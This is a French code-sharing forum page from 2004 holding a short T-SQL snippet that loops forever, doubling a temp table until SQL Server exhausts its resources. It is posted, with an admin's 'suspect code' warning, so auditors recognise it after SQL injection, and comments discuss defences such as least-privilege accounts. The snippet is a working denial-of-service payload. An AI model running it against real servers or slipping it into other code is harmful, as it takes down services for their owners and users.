Vous ne trouvez pas de réponse à votre problème ? Alors posez la question dans le forum. Souvenez-vous qu'il n'y a jamais de question bête, mais rester dans l'ignorance parce que l'on n'ose pas poser une question, ça c'est une erreur !

SQL SERVER - DOS DU SERVEUR


Information sur la source

Attention: ce code a été marqué comme suspect par un admin, il peut donc être dangereux.
Ce code a été laissé sur le site dans un but pédagogique, ne l'exécutez pas si vous ne comprenez pas son contenu!
Catégorie :Trucs & Astuces Classé sous : sqlserver, dos Niveau : Débutant Date de création : 06/10/2004 Date de mise à jour : 12/10/2004 09:32:09 Vu : 3 824

Note :
Aucune note

Commentaire sur cette source (4)
Ajouter un commentaire et/ou une note

Description

Attention. Ce code n'est pas vraiment une astuce. Il utlilise toutes les ressources du server SQL, le ralentit jusqu'au plantage (si le serveur est peut puissant). IL NE FAUT DONC PAS LANCER CE CODE (sauf pour le tester si ça vous plait)
Il est la à but informatif. Pourquoi ? tout simplement pour les audits. Si vous trouvez ce genre de code dans les log(victime d'SQL injection)
vous saurez qu'il faut vite patcher ça.

Sinon, juste pour l'idée de l'insert Select en boucle, je trouvais ça rigolo.

Aucune utilité (sauf l'audit et la connaissance)
 

Source

  • create table #myTmpTable
  • (champ1 varchar)
  • exec('insert into #myTmpTable select ''X''')
  • while 1=1 exec('insert into #myTmpTable select * from #myTmpTable')
create table #myTmpTable
    (champ1 varchar) 
exec('insert into #myTmpTable select ''X''')
while 1=1 exec('insert into #myTmpTable select * from #myTmpTable')

Historique

12 octobre 2004 09:32:09 :
Petite modif

Commentaires et avis

signaler à un administrateur
Commentaire de fabrice69 le 07/10/2004 10:50:10 administrateur CS

En même temps que de fournir la facon de planter le serveur , il serait bon de donner au moins un lien expliquant la méthode pour sécuriser et éviter ce DOS.

Ta source pour le moment peut être considérer comme dangereuse sans cet ajout, et dans ce cas peut être ammené à être désactivée.

Romelard Fabrice.

signaler à un administrateur
Commentaire de white_mage le 07/10/2004 13:33:18

La meilleures methode pour ne pas risquer quelque chose est de ne pas avoir de faille de SQL injection. Si on prend le temps de verifier tous son code on peut éviter cela.

Une autre technique, est d'utiliser un utilisateur qui n'a pas le droit de création d'une table (ou qui n'a pas le droit d'insert). Cette methode est vraiment discutable car en effet, la requête ci-dessus ne fonctionnera pas, mais si un utilisateur peut injecter du code SQL, il peut de toute façon corrompre le serveur.

Les faille de SQL injection sont très très très grâve sur un site ou une application.

Un audit intensif des logs + du code + la création d'un utilisateur avec les droits minimums permettent déjà d'empêcher un massacre.

Alors à  vos sources ;-)

signaler à un administrateur
Commentaire de white_mage le 07/10/2004 13:36:34

Si vous pensez que cette source peut nuire, n'heistez surtout pas à l'enlever.
En effet, j'ai longement réfléchi avant de mettre ce bout de source. Pour finir, j'ai décider de la mettre mais je ne sais toujours pas si c'est très utile.
J'espèrais surtout générer une prisede conscience de la part des developpeurs.

signaler à un administrateur
Commentaire de FENETRES le 26/11/2007 09:10:23

Sans aucun intérêt !

Ajouter un commentaire

Discussions en rapport avec ce code source dans le forum

Commande DOS pour SQLServer 7 [ par MokhTelnet ] y a t'il une commande dos pour SQLSERVER 7 ?(comme la commande sqlplus pour oracle) création automatique d'une base de données SQLServer [ par MokhTelnet ] bonjour j'ai besoin de savoir comment on peut créer une base de données SQLServer lors de l'installation d'une application. mon client ne veux se char Problème SQLSERVER/php [ par LeJulius ] Je travaille actuellement sous SQL SERVER 2000 en lien avec du PHP 4.2.0 Mon problème est le suivant :Mes tables sql contiennent des caractères accent Sauvegarde automatique sqlserver 2000 [ par jojos89 ] Salut a tous,J'ai une base de données en local sur mon pc (avec sqlserver 2000)que je voudrais sauvegardé automatique (tous les soir) s aide pour SQLSERVER [ par nagrom_om ] salut,quelqu'un sait il comment peut on avoir un listing des requetes qui sont passées sous SQL Server ??Merci ! ms access - sqlserver - procédurestockée [ par metasky ] bonjour,je suis actuellement sur une appli liant access et sqlserver...quand je consulte mes procédures stockées dans mon projet access les Quel outil pour SqlServer [ par padurand ] Mon site tourne avec une base de donnees Access, et des pages ASP.Je voudrais remplacer Access par SqlServer ... a priori il ne devrait pas y avoir de exporter des donnees de sqlserver 2005 vers access (dts) [ par tenrod ] Salut a tous ,Voila je travail avec une base sql server 2005 et je voudrais exporter le résultat d'une requete (a partir de ma base sql server) d SQLServer remplacer Null par 0 [ par BasicInstinct ] Bonjour tout le mondej'ai une requete plutot complexe qui calcule differents totaux selon des dates.lorsque pour un mois donné, je n'ai pas de va SqlServer [ par valentin013 ] Bonjour à tous, comment on peux limiter le nombre de lignes d'une requette(Top)valentin


Nos sponsors

Sondage...

CalendriCode

Septembre 2008
LMMJVSD
1234567
891011121314
15161718192021
22232425262728
2930     

Consulter la suite du CalendriCode

Téléchargements



Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel BAÏSE, Merci à Vincent pour ses précieux conseils
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés
Temps d'éxécution de la page : 0,34 sec

Google Coop CodeS-SourceS Google Coop CodeS-SourceS


Certaines images présentes sur le site (notament certains avatars) sont issues des collections IconShock, donc si vous souhaitez utiliser ces icons vous devez les acheter, ne les copiez pas et ne utilisez pas dans vos sites et applications sans les avoir commandé.